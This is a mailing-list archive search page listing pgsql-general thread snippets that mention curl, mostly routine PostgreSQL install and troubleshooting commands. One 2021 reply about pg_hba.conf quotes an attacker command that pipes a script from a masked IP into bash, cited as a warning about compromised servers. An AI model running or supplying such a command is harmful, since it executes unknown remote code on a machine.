curl - Search results in mailing lists
Mailing lists >> pgsql-general >> Thread
2025-05-13 17:06:52 | Re: deb http:///pub/repos/apt/ bookworm-pgdg main 15 (Magnus Hagander)
curl -I " for th different URLs involved at the time of failure? And also note
Mailing lists >> pgsql-general >> Thread
2024-12-01 22:34:48 | Connection to 127.0.0.1 refused in a Dockerfile based on postgres:17-alpine3.20 (Alexander Farber)
curl wget openjdk21 tini # Tell docker-entrypoint.sh to create superuser "postgres" # with password "mypassword
Mailing lists >> pgsql-general >> Thread >> Search in thread (2)
2024-08-26 10:05:38 | Re: Issue Installing PostgreSQL 17 on Ubuntu 22.04 (Jammy) (Kashif Zeeshan)
curl ca-certificates sudo install -d /usr/share/postgresql-common/pgdg sudo curl -o /usr/share/postgresql-common/pgdg/apt.postgresql.org.asc --fail https:///media/keys/ACCC4CF8.asc # Create
Mailing lists >> pgsql-general >> Thread
2024-06-10 22:59:28 | Re: libpq v17 PQsocketPoll timeout is not granular enough (Thomas Munro)
Curl guys' blog being the most often cited public explanation for why: https:///blog/2012/10/10/wsapoll-is-broken/ However
Mailing lists >> pgsql-general >> Thread >> Search in thread (2)
2024-05-07 05:07:22 | Re: problem loading shared lib pg_tde.so (Matthias Apitz)
curl /tmp/pg_tde.ldd libcurl.so.4 => /usr/local/sisis-pap/lib/libcurl.so.4 (0x00007faefc8bd000) I have to figure out why the making of 'curl
Mailing lists >> pgsql-general >> Thread
2023-03-01 01:29:20 | Re: Interval in hours but not in days Leap second not taken into account (Thomas Munro)
curl -s https:///timezones/data/leap-seconds.list | grep -v ''^#'' | cut -f1,2'; TRUNCATE TABLE leap_seconds; INSERT INTO
Mailing lists >> pgsql-general >> Thread
2023-02-02 11:37:44 | Re: pgBackrest Error : authentication method 10 not supported (Daulat)
curl -LO https:///pgbackrest/pgbackrest/archive/release/2.43.tar.gz wget https:///pub/source/v14.6/postgresql-14.6.tar.gz Thanks On Thu, Feb 2, 2023 at 2:57 PM Magnus
Mailing lists >> pgsql-general >> Thread
2022-06-20 03:33:48 | A error happend when I am clone the git repository (Wen Yi)
curl 92 HTTP/2 stream 3 was not closed cleanly before end of the underlying stream
Mailing lists >> pgsql-general >> Thread >> Search in thread (2)
2022-04-13 09:07:31 | RE: OpenSSL@1.1 not getting linked with Homebrew - trying to install postgresql (cecile rougnaux)
curl -fsSL https:///Homebrew/install/HEAD/install.sh)" when I try to install postgresql with the command brew install
Mailing lists >> pgsql-general >> Thread
2022-04-01 01:22:05 | Does PGDG apt repository support ARM64? (Daniele Varrazzo)
curl -skf https:///media/keys/ACCC4CF8.asc \
> /etc/apt/trusted.gpg.d/postgresql.asc
cat > /etc/apt/preferences.d/pgdg.pref <
Mailing lists >> pgsql-general >> Thread
2022-02-14 11:09:07 | Re: Babelfish for PostgreSQL (Emanuel Calvo)
Data Engineer / ViaDB Founder CanalDBA BDFL -- Sumate al Slack canaldba.com! curl -s https:///3manuek/key.asc
Mailing lists >> pgsql-general >> Thread
2021-12-23 11:25:13 | Re: How to confirm the pg_hba.conf service is correctly working (Imre Samu)
curl http://1xx.1x.7x.1/1.sh | bash'; so you can expect "anything" installed and running hidden in the background
Mailing lists >> pgsql-general >> Thread
2021-09-15 00:50:24 | Re: To JIT (or not!) in Ubuntu packages (Thomas Munro)
curl -sO http:///pub/repos/apt/pool/14/p/postgresql-14/postgresql-14_14~beta3-1.pgdg+1_arm64.deb $ ar x postgresql-14_14~beta3-1.pgdg+1_arm64.deb $ tar xf data
Mailing lists >> pgsql-general >> Thread >> Search in thread (4)
2020-12-26 12:40:07 | Re: Postgres read jsonb content from stdin (Ian Lawrence Barwick)
curl http://localhost/json.txt {"bar": "baz", "balance": 7.77, "active": false} $ psql -v jsonval="`curl -s http://localhost/json.txt
Mailing lists >> pgsql-general >> Thread
2020-05-07 15:04:30 | Re: pg_restore V12 fails consistently against piped pg_dumps (Mohamed Wael Khobalatte)
curl which was the original case) - pg_restore -j4 --verbose --clean --no-acl --no-owner